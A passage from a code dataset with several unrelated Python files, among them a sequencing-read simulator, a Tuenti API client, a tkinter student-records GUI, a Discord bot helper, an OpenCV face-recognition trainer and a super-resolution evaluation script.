s < target : \n l = common.get_num_from_exp( read_mu )\n lens.append( l ) \n s += l\n else : \n pass \n \n else : # with read_dist file includes read lengths\n\n with open(read_dist) as f:\n lens = [ int(x.strip()) for x in f.readlines() ]\n\n print >> sys.stderr, \"{0} Randomly mixing read lengths to prevent any bias\".format( common.INFO_011 )\n shuffle(lens)\n\n ################################################################## \n [forward, backward] = mut.sim_reads_given_chr( sub_cmd, prefix, seq, lens, \n rev_strd, replace, read_mu, read_dist, cov_mu,\n sub_mu, in_mu, del_mu, times ) \n\n \n # if ends\n\n print >> sys.stderr, \"{0} Total {1} reads are generated; {2} is forward, {3} is reversed\".format( common.INFO_010, forward + backward, forward, backward )\n fasta.close()\n\n\n###############################################################################\n \ndef qualfromfa( fasta ) : \n\n fa = open( fasta, 'r' ) \n out_fq = open( fasta.rstrip('a') + 'b', 'w' )\n out_fb = open( fasta.rstrip('a') + 'q', 'w' )\n\n read_name = ''\n uplmt = MAX_LEN\n lwlmt = MIN_LEN\n\n for line in fa : \n \n if line.startswith('>') : \n read_name = line\n else :\n if len( line.strip() ) == 0 :\n # remove zero size reads\n pass\n #elif len( line.strip() ) < lwlmt : # since CA can't deal with reads longer than lwlmt\n # pass\n elif len( line.strip() ) > uplmt : # since CA can't deal with reads longer than uplmt\n out_fb.write( read_name )\n out_fb.write( line[:uplmt] + '\\n' )\n out_fq.write( read_name )\n out_fq.write( 'M'*uplmt + '\\n' )\n else : \n out_fb.write( read_name )\n out_fb.write( line )\n out_fq.write( read_name )\n out_fq.write( 'M'*len( line.strip() ) + '\\n' )\n\n out_fb.close()\n out_fq.close()\n fa.close()\n\n\n###############################################################################\n# muate each reads\ndef mutate( sub_cmd, tech, prefix, ref_file, replace, copy, sub_mu, in_mu, del_mu ) :\n\n read_mu = 0\n read_dist = ''\n\n common.intro( tech, ref_file, read_mu, read_dist, copy, sub_mu, in_mu, del_mu ) \n\n fasta = open(ref_file)\n seq = ''\n firstline = fasta.readline().strip() # skip the first line\n i = 0\n\n if len( firstline.split(' ') ) == 2 : \n print >> sys.stderr, firstline\n init = int( firstline.split(' ')[1].split(':')[1].split('-')[0] ) # skip the first line '>'\n\n elif len( firstline.split(' ') ) == 3 : \n init = 1\n else : \n init = 0\n\n \n pos = 0\n read_num = 0\n\n if sub_cmd == \"fq\" : \n out_fq = open( prefix + \".fastq\", 'w' )\n print >> sys.stderr, \"{0} {1} are created\".format( common.INFO_002, prefix + \".fastq\" )\n elif sub_cmd == \"fa\" : \n out_fa = open( prefix + \".fasta\", 'w' )\n print >> sys.stderr, \"{0} {1} are created\".format( common.INFO_003, prefix + \".fasta\" )\n #elif sub_cmd == \"fafq\" : # depreciated from v1.6\n # out_fa = open( prefix + \".fa\", 'w' )\n # out_fq = open( prefix + \".fq\", 'w' )\n # print >> sys.stderr, \"{0} {1}, {2} are created\".format( common.INFO_004, prefix + \".fa\", prefix + \".fq\" )\n else : \n print >> sys.stderr, \"{0} sub command {1} is NOT supported\".format( common.ERR_001, sub_cmd )\n\n total_base = 0\n i = 0\n\n #readlines() would be considered\n\n # take one long reads\n\n for line in fasta : \n seq += line.strip()\n\n #print len(seq)\n #out_fa.write(seq + '\\n')\n\n for i in range( 0, copy ) : \n orientation, mut_seq, mut_qual = common.mutate( seq, \"M\"*len(seq), sub_mu, in_mu, del_mu, \"off\", replace )\n if sub_cmd == \"fa\" : \n out_fa.write(mut_seq + '\\n')\n out_fa.write(mut_qual + '\\n')\n else : \n print >> sys.stderr, \"{0} sub command {1} is NOT supported\".format( common.ERR_001, sub_cmd )\n \n\n if sub_cmd == \"fq\" : \n out_fq.close()\n elif sub_cmd == \"fa\" : \n out_fa.close()\n elif sub_cmd == \"fafq\" : \n out_fa.close()\n out_fq.close()\n \n fasta.close()\n\n\n","sub_path":"readsim/readsim-1.6/src/sim.py","file_name":"sim.py","file_ext":"py","file_size_in_byte":7033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"641513058","text":"#!/bin/env/python\n\n # tuentiAPI Class\n # Python implementation of the PHP API by Sergios Cruz aka scromega (scr.omega at gmail dot com) http://scromega.net\n #\n # More info:\n # http://scromega.net/7-accediendo-a-la-api-cerrada-de-tuenti.html\n \n \n # Modo de uso:\n #\n # from tuentiAPI import tuentiAPI\n # api = tuentiAPI(\"cani@hotmail.com\",\"1234\") # (tu usuario y password)\n # print api.request(\"getFriends\",{})\n # friends,inbox = api.mrequest( ((\"getFriends\",{}),(\"getInbox\",{})) )\n # print friends\n # print inbox\n\nimport simplejson\nimport hashlib\nimport httplib2\n\nclass tuentiAPI:\n\tuser_data = {}\n\tdef __init__(self,email,pw):\n\t\traw_response = self.http(self.json(((\"getChallenge\",{\"type\":\"login\"}),)))\n\t\tresponse = simplejson.loads(raw_response)[0]\n\t\tpasscode = self.md5(response['challenge']+self.md5(pw))\n\t\tappkey = ('MDI3MDFmZjU4MGExNWM0YmEyYjA5MzRkODlm'+\n\t\t 'Mjg0MTU6MC4xMzk0ODYwMCAxMjYxMDYwNjk2')\n\t\traw_response = self.http(self.json((('getSession',{\n\t\t\t\"passcode\":passcode,\n\t\t\t\"application_key\":appkey,\n\t\t\t\"timestamp\":response['timestamp'],\n\t\t\t\"seed\":response['seed'],\n\t\t\t\"email\":email\n\t\t}),)))\n\t\tself.user_data = simplejson.loads(raw_response)[0]\n\n\tdef md5(self,str):\n\t\treturn hashlib.md5(str).hexdigest()\n\tdef http(self,data):\n\t\theaders = {\"Content-length\":str(len(data))}\n\t\turl = 'http://api.tuenti.com/api/'\n\t\thttp = httplib2.Http()\n\t\trequest, reply = http.request(url,'POST',headers = headers,body = data)\n\t\treturn reply\n\tdef json(self,iterable):\n\t\tcalls = []\n\t\trequest = {}\n\t\tfor k in iterable:\n\t\t\tcalls.append(k[:2])\n\t\t\n\t\tif self.user_data.get(\"session_id\",False):\n\t\t\trequest['session_id'] = self.user_data['session_id']\n\t\trequest['version'] = '0.4'\n\t\trequest['requests'] = calls\n\t\treturn simplejson.dumps(request)\n\tdef request(self,method, parameters={}):\n\t\treturn self.mrequest(((method, parameters),))[0]\n\tdef mrequest(self,iterable):\n\t\ttmp = self.json(iterable)\n\t\ttmp = self.http(tmp)\n\t\ttmp = simplejson.loads(tmp)\n\t\treturn tmp\n\n","sub_path":"tuentiAPI.py","file_name":"tuentiAPI.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"557947348","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.availability, name=\"availability\"),\n path('servicemen-order/', views.ServicemenOrderListView, name=\"servicemen_order\"),\n path('servicemen-order-detail//', views.ServicemenOrderDetailView.as_view(), name=\"servicemen_order_detail\"),\n path('servicemen-order-status//', views.ServicemenOrderStatuChangeView.as_view(), name=\"servicemen_orderstatus_change\"),\n path('servicemen-new-order/', views.ServicemenNewOrderListView.as_view(), name=\"servicemen_new_order\"),\n\n]","sub_path":"servicemen/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"359925310","text":"import tkinter as tk\n\nfrom Tables.Student import Student\n\nfrom tk_extension.multilistBox import MultiListBox\n\n\nclass StudentPage(tk.Frame):\n \"\"\"\n Main Student Page\n \"\"\"\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.columnconfigure([x for x in range(7)], minsize=250)\n self.rowconfigure([x for x in range(9)], minsize=100)\n self.controller = controller\n self.main_label()\n self.student_listbox()\n self.refresh_button()\n self.buttons()\n\n def main_label(self):\n \"\"\"create student main label\n \"\"\"\n label = tk.Label(\n self,\n text=\"Student Page\",\n font=self.controller.title_font\n )\n label.grid(row=0, column=6, sticky=\"nsew\", padx=5, pady=5)\n\n def buttons(self):\n \"\"\"create room page buttons\n \"\"\"\n # Return Home Button\n btn_return = tk.Button(\n self,\n text=\"Home\",\n command=lambda: self.controller.show_frame(\"StartPage\"),\n font=self.controller.normal_font,\n )\n btn_return.grid(row=4, column=6, sticky=\"nsew\", padx=5, pady=5)\n # Create Student Button\n btn_create = tk.Button(\n self,\n text=\"Create Student\",\n command=lambda: self.controller.show_frame(\"CreateStudentPage\"),\n font=self.controller.normal_font,\n )\n btn_create.grid(row=1, column=6, sticky=\"nsew\", padx=5, pady=5)\n # Delete Student Button\n btn_delete = tk.Button(\n self,\n text=\"Delete Student\",\n command=lambda: self.delete_student(),\n font=self.controller.normal_font,\n )\n btn_delete.grid(row=2, column=6, sticky=\"nsew\", padx=5, pady=5)\n # Change Student Button\n btn_change = tk.Button(\n self,\n text=\"Change Student\",\n command=lambda: self.update_student(),\n font=self.controller.normal_font,\n )\n btn_change.grid(row=3, column=6, sticky=\"nsew\", padx=5, pady=5)\n\n def student_listbox(self):\n \"\"\"create student listbox\n \"\"\"\n data = [\n ('id', 10),\n ('name', 15),\n ('second name', 15),\n ('lastname', 15),\n ('ssn', 15),\n ('email', 20),\n ('field of study', 20),\n ('department', 20),\n ('place of residence', 30)\n ]\n\n self.list_students = MultiListBox(master=self, data=data)\n self.refresh()\n self.list_students.grid(\n row=0,\n column=0,\n columnspan=6,\n rowspan=9,\n sticky=\"nswe\",\n padx=5,\n pady=5\n )\n\n def delete_student(self):\n \"\"\"create student listbox\n \"\"\"\n idx = self.list_students.index(tk.ACTIVE)\n del_student = self.controller.students.pop(idx)\n\n del_student.delete(self.controller.db)\n self.delete_from_groups(del_student)\n self.controller.db.commit_conn()\n\n del del_student\n # config\n self.controller.frames[\"LabStudentPage\"].refresh_student_listbox()\n self.controller.frames[\"ExeStudentPage\"].refresh_student_listbox()\n self.controller.frames[\"YearStudentPage\"].refresh_student_listbox()\n self.restart()\n\n def delete_from_groups(self, student):\n \"\"\"func delete student from groups\n\n Args:\n student (Student): student which we want delete\n \"\"\"\n # exe group\n for exe_group in self.controller.exe_groups:\n if student in exe_group.get_students():\n exe_group.delete_student(student, self.controller.db)\n # lab group\n for lab_group in self.controller.lab_groups:\n if student in lab_group.get_students():\n lab_group.delete_student(student, self.controller.db)\n # year group\n for year_group in self.controller.year_groups:\n if student in year_group.get_students():\n year_group.delete_student(student, self.controller.db)\n\n def update_student(self):\n \"\"\"func set student to update and change\n page to ChangeStudentPage\n \"\"\"\n idx = self.list_students.index(tk.ACTIVE)\n student = self.controller.students[idx]\n\n self.controller.frames[\"ChangeStudentPage\"].set_student(student)\n self.controller.frames[\"ChangeStudentPage\"].fill_entry()\n self.controller.show_frame(\"ChangeStudentPage\")\n\n def restart(self):\n \"\"\"func restart frame\n \"\"\"\n self.refresh()\n self.controller.show_frame(\"StudentPage\")\n\n def refresh_button(self):\n \"\"\"create refresh button\n \"\"\"\n btn_refresh = tk.Button(\n master=self,\n text=\"refresh\",\n command=lambda: self.restart(),\n font=self.controller.normal_font,\n )\n btn_refresh.grid(row=8, column=6, sticky=\"nsew\", padx=5, pady=5)\n\n def refresh(self):\n \"\"\"func refresh student listbox\n \"\"\"\n self.list_students.delete(0, tk.END)\n for i, student in enumerate(self.controller.students):\n try:\n field = student.get_field_of_study().get_name()\n try:\n department = student.get_field_of_study().get_department().get_name()\n except AttributeError:\n department = \"NULL\"\n except AttributeError:\n field = \"NULL\"\n department = \"NULL\"\n\n output = (\n student.get_id(),\n student.get_name(),\n student.get_sec_name(),\n student.get_lastname(),\n student.get_ssn(),\n student.get_email(),\n field,\n department,\n student.get_place_of_residence()\n )\n self.list_students.insert(i, output)\n\n\nclass CreateStudentPage(tk.Frame):\n \"\"\"\n Page where we can create student\n \"\"\"\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.columnconfigure([x for x in range(9)], minsize=250)\n self.rowconfigure([x for x in range(18)], minsize=50)\n self.controller = controller\n self.main_label()\n self.return_button()\n self.home_button()\n self.name_entry()\n self.sec_name_entry()\n self.lastname_entry()\n self.ssn_entry()\n self.email_entry()\n self.place_entry()\n self.field_listbox()\n self.submit()\n\n def main_label(self):\n \"\"\"create student main label\n \"\"\"\n label = tk.Label(\n self,\n text=\"Create Student\",\n font=self.controller.title_font\n )\n label.grid(\n row=0,\n column=0,\n rowspan=1,\n columnspan=4,\n sticky=\"news\",\n padx=5,\n pady=5\n )\n\n def return_button(self):\n \"\"\"create return button\n \"\"\"\n btn_return = tk.Button(\n self,\n text=\"return\",\n command=lambda: self.return_refresh(),\n font=self.controller.normal_font,\n )\n btn_return.grid(\n row=16,\n column=0,\n rowspan=2,\n columnspan=2,\n sticky=\"news\",\n padx=5,\n pady=5\n )\n\n def home_button(self):\n \"\"\"create home button\n \"\"\"\n btn_home = tk.Button(\n self,\n text=\"Home\",\n command=lambda: self.home_refresh(),\n font=self.controller.normal_font,\n )\n btn_home.grid(\n row=16,\n column=2,\n rowspan=2,\n columnspan=2,\n sticky=\"news\",\n padx=5,\n pady=5\n )\n\n def return_refresh(self):\n \"\"\"func change page to StudentPage\n \"\"\"\n self.refresh()\n self.controller.show_frame(\"StudentPage\")\n\n def home_refresh(self):\n \"\"\"func change page to StartPage\n \"\"\"\n self.refresh()\n self.controller.show_frame(\"StartPage\")\n\n def refresh(self):\n \"\"\"clear all entries\n \"\"\"\n self.e_name.delete(0, tk.END)\n self.e_lastname.delete(0, tk.END)\n self.e_email.delete(0, tk.END)\n self.e_sec_name.delete(0, tk.END)\n self.e_place.delete(0, tk.END)\n self.e_ssn.delete(0, tk.END)\n\n def name_entry(self):\n \"\"\"create entry for name with label\n \"\"\"\n l_name = tk.Label(\n master=self,\n text=\"name\",\n font=self.controller.normal_font,\n anchor=tk.W,\n relief=tk.RAISED\n )\n l_name.grid(\n row=1,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n self.e_name = tk.Entry(\n master=self,\n font=self.controller.entry_font\n )\n self.e_name.grid(\n row=2,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n def sec_name_entry(self):\n \"\"\"create entry for second name with label\n \"\"\"\n l_sec_name = tk.Label(\n master=self,\n text=\"second name\",\n font=self.controller.normal_font,\n anchor=tk.W,\n relief=tk.RAISED\n )\n l_sec_name.grid(\n row=3,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n self.e_sec_name = tk.Entry(\n master=self,\n font=self.controller.entry_font\n )\n self.e_sec_name.grid(\n row=4,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n def lastname_entry(self):\n \"\"\"create entry for lastname with label\n \"\"\"\n l_lastname = tk.Label(\n master=self,\n text=\"lastname\",\n font=self.controller.normal_font,\n anchor=tk.W,\n relief=tk.RAISED\n )\n l_lastname.grid(\n row=5,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n self.e_lastname = tk.Entry(\n master=self,\n font=self.controller.entry_font\n )\n self.e_lastname.grid(\n row=6,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n def ssn_entry(self):\n \"\"\"create entry for ssn with label\n \"\"\"\n l_ssn = tk.Label(\n master=self,\n text=\"ssn\",\n font=self.controller.normal_font,\n anchor=tk.W,\n relief=tk.RAISED\n )\n l_ssn.grid(\n row=7,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n self.e_ssn = tk.Entry(\n master=self,\n font=self.controller.entry_font\n )\n self.e_ssn.grid(\n row=8,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n def email_entry(self):\n \"\"\"create entry for email with label\n \"\"\"\n l_email = tk.Label(\n master=self,\n text=\"email\",\n font=self.controller.normal_font,\n anchor=tk.W,\n relief=tk.RAISED\n )\n l_email.grid(\n row=9,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n self.e_email = tk.Entry(\n master=self,\n font=self.controller.entry_font\n )\n self.e_email.grid(\n row=10,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n def place_entry(self):\n \"\"\"create entry for place of residence with label\n \"\"\"\n l_place = tk.Label(\n master=self,\n text=\"place of residence\",\n font=self.controller.normal_font,\n anchor=tk.W,\n relief=tk.RAISED\n )\n l_place.grid(\n row=11,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n self.e_place = tk.Entry(\n master=self,\n font=self.controller.entry_font\n )\n self.e_place.grid(\n row=12,\n column=0,\n columnspan=4,\n sticky=\"nswe\",\n pady=0,\n padx=5\n )\n\n def field_listbox(self):\n \"\"\"create field of study listbox for Student Page\n \"\"\"\n l_field = tk.Label(\n master=self,\n text=\"field of study\",\n font=self.controller.normal_font,\n relief=tk.RAISED\n )\n l_field.grid(\n row=0,\n column=4,\n rowspan=1,\n columnspan=3,\n sticky=\"nswe\",\n pady=5,\n padx=5\n )\n\n data = [\n ('field of study', 20),\n ('department', 20)\n ]\n\n self.list_field = MultiListBox(master=self, data=data)\n self.list_field.grid(\n row=1,\n column=4,\n rowspan=17,\n columnspan=3,\n sticky=\"nswe\",\n pady=5,\n padx=5\n )\n self.refresh_field_listbox()\n\n def refresh_field_listbox(self):\n \"\"\"refresh field of study listbox\n \"\"\"\n self.list_field.delete(0, tk.END)\n for i, field in enumerate(self.controller.fields):\n try:\n dept = field.get_department().get_name()\n except AttributeError:\n dept = \"NULL\"\n\n output = (\n field.get_name(),\n dept\n )\n self.list_field.insert(i, output)\n\n def submit(self):\n \"\"\"create submit button\n \"\"\"\n sub_btn = tk.Button(\n master=self,\n text=\"submit\",\n command=lambda: self.create_student(),\n font=self.controller.normal_font,\n )\n sub_btn.grid(\n row=14,\n column=0,\n rowspan=2,\n columnspan=4,\n sticky=\"nswe\",\n pady=5,\n padx=5\n )\n\n def create_student(self):\n \"\"\"func create new student and config other frames\n \"\"\"\n try:\n idx = self.list_field.index(tk.ACTIVE)\n temp_field = self.controller.fields[idx]\n except IndexError:\n temp_field = None\n\n try:\n ssn = int(self.e_ssn.get())\n except ValueError:\n ssn = 'NULL'\n\n self.controller.students.append(Student(\n name=self.e_name.get(),\n sec_name=self.e_sec_name.get(),\n lastname=self.e_lastname.get(),\n ssn=ssn,\n email=self.e_email.get(),\n field_of_study=temp_field,\n place_of_residence=self.e_place.get()\n ))\n\n # insert to db\n self.controller.students[-1].insert(self.controller.db)\n self.controller.db.commit_conn()\n # refresh Groups frames\n self.controller.frames[\"LabStudentPage\"].refresh_student_listbox()\n self.controller.frames[\"ExeStudentPage\"].refresh_student_listbox()\n self.controller.frames[\"YearStudentPage\"].refresh_student_listbox()\n # refresh self\n self.refresh()\n self.controller.frames[\"StudentPage\"].restart()\n\n\nclass ChangeStudentPage(CreateStudentPage):\n \"\"\"\n Page where we can update Student\n \"\"\"\n def __init__(self, parent, controller):\n CreateStudentPage.__init__(self, parent, controller)\n if controller.students:\n self.student = controller.students[0]\n\n def main_label(self):\n \"\"\"create update student main label\n \"\"\"\n label = tk.Label(\n self,\n text=\"Change Student\",\n font=self.controller.title_font\n )\n label.grid(\n row=0,\n column=0,\n rowspan=1,\n columnspan=4,\n sticky=\"news\",\n padx=5,\n pady=5\n )\n\n def submit(self):\n \"\"\"crate submit button\n \"\"\"\n sub_btn = tk.Button(\n master=self,\n text=\"submit\",\n command=lambda: self.update_student(),\n font=self.controller.normal_font,\n )\n sub_btn.grid(\n row=14,\n column=0,\n rowspan=2,\n columnspan=4,\n sticky=\"news\",\n padx=5,\n pady=5\n )\n\n def fill_entry(self):\n \"\"\"fill all entries with self attrs\n \"\"\"\n self.e_name.insert(tk.END, str(self.student.get_name()))\n self.e_lastname.insert(tk.END, str(self.student.get_lastname()))\n self.e_email.insert(tk.END, str(self.student.get_email()))\n self.e_sec_name.insert(tk.END, str(self.student.get_sec_name()))\n self.e_place.insert(tk.END, str(self.student.get_place_of_residence()))\n self.e_ssn.insert(tk.END, str(self.student.get_ssn()))\n\n def set_student(self, student):\n \"\"\"set student instance\n\n Args:\n student (Student): student which we want update\n \"\"\"\n self.student = student\n\n def update_student(self):\n \"\"\"func update student and config other frames\n \"\"\"\n self.set_attr_student()\n self.student.update(self.controller.db)\n self.controller.db.commit_conn()\n\n # config after update\n self.controller.frames[\"LabStudentPage\"].refresh_student_listbox()\n self.controller.frames[\"ExeStudentPage\"].refresh_student_listbox()\n self.controller.frames[\"YearStudentPage\"].refresh_student_listbox()\n self.refresh()\n self.controller.frames[\"StudentPage\"].restart()\n\n def set_attr_student(self):\n \"\"\"changes attrs of student\n \"\"\"\n try:\n idx = self.list_field.index(tk.ACTIVE)\n field = self.controller.fields[idx]\n self.student.set_field_of_study(field)\n except IndexError:\n pass\n\n self.student.set_name(self.e_name.get())\n self.student.set_sec_name(self.e_sec_name.get())\n self.student.set_lastname(self.e_lastname.get())\n self.student.set_ssn(int(self.e_ssn.get()))\n self.student.set_email(self.e_email.get())\n self.student.set_place_of_residence(self.e_place.get())\n","sub_path":"Frames/StudentFrame.py","file_name":"StudentFrame.py","file_ext":"py","file_size_in_byte":18884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"526000618","text":"import asyncio\n\nfrom aiocronjob import app, manager\nfrom starlette.testclient import TestClient\n\nclient = TestClient(app=app)\n\n\ndef test_list_jobs(mocker):\n some_datetime = \"2020-06-06T08:39:14.065188+00:00\"\n mock = mocker.patch(\"aiocronjob.job.now\")\n mock.return_value = some_datetime\n\n async def task1():\n await asyncio.sleep(5)\n\n async def task2():\n await asyncio.sleep(5)\n\n manager.register(task1)\n manager.register(task2)\n\n response = client.get(\"/api/jobs\")\n\n desired_output = [\n {\n \"name\": \"Job_0-task1\",\n \"next_run_in\": None,\n \"last_status\": \"created\",\n \"enabled\": \"True\",\n \"crontab\": \"\",\n \"created_at\": some_datetime,\n \"started_at\": None,\n \"stopped_at\": None,\n },\n {\n \"name\": \"Job_1-task2\",\n \"next_run_in\": None,\n \"last_status\": \"created\",\n \"enabled\": \"True\",\n \"crontab\": \"\",\n \"created_at\": some_datetime,\n \"started_at\": None,\n \"stopped_at\": None,\n },\n ]\n\n assert response.json() == desired_output\n","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"549718984","text":"import csv\r\nimport logging\r\nimport time\r\nimport asyncio\r\nimport youtube_dl\r\n\r\nasync def init(cli):\r\n global settings\r\n settings = {}\r\n global admins\r\n admins = {}\r\n global banned\r\n banned = {}\r\n global toDoList\r\n toDoList = {}\r\n global client\r\n client = cli\r\n global m\r\n m = None\r\n global musicPlayers\r\n servers = []\r\n for server in client.servers:\r\n servers.append(server.id)\r\n musicPlayers = {k:[] for (k) in servers} #Intended format: {'server ID' : [function, ['list', 'of', 'songs']]}\r\n global logger\r\n\r\n logging.basicConfig(level = logging.INFO)\r\n\r\n logger = logging.getLogger('discord') # tell the logger to exist and give it an alias\r\n\r\n handler = logging.FileHandler(filename='discord.log', encoding='utf-8', mode='w')\r\n # part of the logger that interacts with files automagically\r\n\r\n handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))\r\n # I can read and understand this, but I don't understand the syntax in the string\r\n\r\n logger.addHandler(handler)\r\n return\r\n\r\n\r\ndef keepPlaying(player):\r\n if player.is_done():\r\n logger.info(\"Stopping music.\")\r\n old = musicPlayers[server.id].pop(0)\r\n old.stop()\r\n if len(musicPlayers[server.id]) > 0:\r\n musicPlayers[server.id][0].start()\r\n\r\n\r\nasync def writeSettings():\r\n for server in client.servers:\r\n with open(\"{}.csv\".format(server.id), 'w', newline='') as file:\r\n write = csv.writer(file, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\r\n write.writerow(settings[server.name])\r\n write.writerow(admins[server.name])\r\n write.writerow(banned[server.name])\r\n write.writerow(toDoList[server.name])\r\n\r\n\r\nasync def permCheck(lvl, m):\r\n if m.author.id == \"176473884919332864\": #My uID\r\n return True\r\n elif ((m.author.id in admins[m.server.name]) or m.author == m.server.owner) and (lvl == \"admins\"):\r\n return True\r\n elif (m.author.id in banned[m.server.name]):\r\n await client.send_message(m.channel, \"Error: User is banned.\")\r\n return False\r\n elif lvl != \"admins\" and lvl != \"kyle\":\r\n return True\r\n else:\r\n await client.send_message(m.channel, \"Error! Insufficient permissions! Command permission level: {}\".format(lvl))\r\n return False\r\n\r\n","sub_path":"pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"275568534","text":"\nimport cv2\nimport os\nimport numpy as np\nfrom PIL import Image\nimport pickle\n\n\ncascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\nrecognise = cv2.face.LBPHFaceRecognizer_create()\n\n\ndef getdata():\n\n current_id = 0\n label_id = {} \n face_train = [] \n face_label = [] \n \n \n BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\n my_face_dir = os.path.join(BASE_DIR,'image_data')\n\n\n for root, dirs, files in os.walk(my_face_dir):\n for file in files:\n\n\n if file.endswith(\"png\") or file.endswith(\"jpg\"):\n\n\n path = os.path.join(root, file)\n\n\n label = os.path.basename(root).lower()\n\n \n if not label in label_id:\n label_id[label] = current_id\n current_id += 1\n ID = label_id[label]\n\n\n pil_image = Image.open(path).convert(\"L\")\n\n\n image_array = np.array(pil_image, \"uint8\")\n \n \n face = cascade.detectMultiScale(image_array)\n\n \n for x,y,w,h in face:\n img = image_array[y:y+h, x:x+w]\n \n cv2.imshow(\"Test\",img)\n cv2.waitKey(1)\n face_train.append(img)\n face_label.append(ID)\n\n\n with open(\"labels.pickle\", 'wb') as f:\n pickle.dump(label_id, f)\n \n\n return face_train,face_label\n\n\nface,ids = getdata()\nrecognise.train(face, np.array(ids))\nrecognise.save(\"trainner.yml\")\n","sub_path":"1 - Python - Arduino_Face_ID_Yüz_Tanıma_Güvenlik_Projesi/YÜZ_TANITMAK_İÇİN/3- yuz_verisi_yapay_zeka_egitim.py","file_name":"3- yuz_verisi_yapay_zeka_egitim.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195898859","text":"num_words = int(input())\r\nword_list = sorted(input().strip().split())\r\n\r\nn, m = int(input()), int(input())\r\nboggle = [input().strip().split() for i in range(n)]\r\n\r\ndef in_range(u, v):\r\n return (0 <= u and u < n) and (0 <= v and v < m)\r\n\r\ndef find_what_7(i, u, v, visited, word):\r\n if i + 1 == len(word):\r\n print(word, end=' ')\r\n return 1\r\n\r\n matched_words = 0\r\n for delta_u in [-1, 0, 1]:\r\n for delta_v in [-1, 0, 1]:\r\n if delta_u or delta_v:\r\n next_u, next_v = u + delta_u, v + delta_v\r\n if in_range(next_u, next_v) and not visited[next_u][next_v]:\r\n if boggle[next_u][next_v] == word[i + 1]:\r\n visited[next_u][next_v] = True\r\n matched_words += find_what_7(i + 1, next_u, next_v, visited, word)\r\n visited[next_u][next_v] = False\r\n\r\n return matched_words\r\n\r\nmatched_words = 0\r\nvisited = [[False for _ in range(m)] for _ in range(n)]\r\nfor word in word_list:\r\n for u in range(n):\r\n for v in range(m):\r\n if word[0] == boggle[u][v]:\r\n visited[u][v] = True\r\n matched_words += find_what_7(0, u, v, visited, word)\r\n visited[u][v] = False\r\n\r\nif matched_words == 0:\r\n print('0')\r\n","sub_path":"Homework/Group_1/Problem_3.py","file_name":"Problem_3.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"282714559","text":"import json\nimport os\nimport warnings\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nfrom skimage.transform import downscale_local_mean\nfrom skimage import io, img_as_uint\nfrom tqdm import tqdm_notebook, tqdm\nfrom zipfile import ZipFile\nimport torch\nimport cv2\nfrom DataLoader import ImagesetDataset, ImageSet\nfrom DeepNetworks.HRNet import HRNet\nfrom Evaluator import shift_cPSNR, shift_cMSE, cSSIM, cMSE\nfrom utils import getImageSetDirectories, readBaselineCPSNR, collateFunction\n\n\ndef get_sr_and_score(imset, model, aposterior_gt, next_sr, num_frames, min_L=16):\n '''\n Super resolves an imset with a given model.\n Args:\n imset: imageset\n model: HRNet, pytorch model\n min_L: int, pad length\n Returns:\n sr: tensor (1, C_out, W, H), super resolved image\n scPSNR: float, shift cPSNR score\n '''\n\n if imset.__class__ is ImageSet:\n collator = collateFunction(num_frames, min_L=min_L)\n lrs, alphas, hrs, hr_maps, names = collator([imset])\n elif isinstance(imset, tuple): # imset is a tuple of batches\n lrs, alphas, hrs, hr_maps, names = imset\n\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n #print(\"LRS SHAPE:\", lrs.shape)\n #print(\"ALPHAS SHAPE\", alphas.shape)\n\n #lrs = lrs[:, :num_frames, :, :]\n #alphas = alphas[:, :num_frames]\n\n lrs = lrs.float().to(device)\n alphas = alphas.float().to(device)\n\n sr = model(lrs, alphas)[:, 0]\n sr = sr.detach().cpu().numpy()[0]\n sr = np.clip(sr, 0, 1)\n\n# sr = downscale_local_mean(sr, (2, 2))\n\n cur_hr = hrs.numpy()[0]\n cur_hr_map = hr_maps.numpy()[0]\n cur_sr = sr\n\n# cur_hr = downscale_local_mean(cur_hr, (2, 2))\n# 